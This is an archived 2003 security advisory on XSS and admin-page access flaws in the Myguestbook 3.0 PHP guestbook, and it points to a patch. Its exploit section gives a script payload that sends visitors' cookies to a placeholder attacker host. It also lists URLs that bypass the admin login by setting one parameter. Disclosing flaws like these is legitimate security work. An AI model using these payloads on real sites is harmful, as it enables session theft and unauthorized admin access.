Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: General :: sb6011.htm

Myguestbook (PHP) XSS and admin page access



22th Feb 2003 [SBWID-6011]
COMMAND

	Myguestbook (PHP) XSS and admin page access

SYSTEMS AFFECTED

	Myguestbook version : 3.0

PROBLEM

	Frog Man [leseulfrog@hotmail.com] found :
	
	 http://www.frog-man.org/tutos/Myguestbook.txt
	
	 PHP Code/Location :
	 같같같같같같같같같
	
	If pseudo = [SCRIPT],
	e-mail = >[SCRIPT]
	or message = </textarea>[SCRIPT]
	
	[SCRIPT] will be executed on index.php, /admin/user_modif.php, 
	/admin/admin_modif.php and /admin/admin_suppr.php .
	
	 /admin/confirm_connect.php :
	 ---------------------------------------------
	 SetCookie("Myguestbook","$name:$password");
	 ---------------------------------------------
	
	
	
	
	
	/admin/admin_pass.php, /admin/admin_index.php, /admin/admin_modif.php and 
	/admin/admin_suppr.php :
	--------------------------------------------------------------------
	<?
	if(!isset($Myguestbook))
		  header("location:../index.php?MSG=permis");
	?>
	--------------------------------------------------------------------
	
	
	
	 Exploits :
	 같같같같같
	
	[SCRIPT] :
	<script>
	location='http://[attacker]/file.php?'+document.cookie;
	</script>
	
	http://[target]/admin/admin_index.php?Myguestbook=1
	http://[target]/admin/admin_pass.php?Myguestbook=1
	http://[target]/admin/admin_modif.php?Myguestbook=1
	http://[target]/admin/admin_suppr.php?Myguestbook=1
	
	http://[target]/admin/user_modif.php?id=[MESSAGEID]
	

SOLUTION

	A patch can be found on http://www.phpsecure.org


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH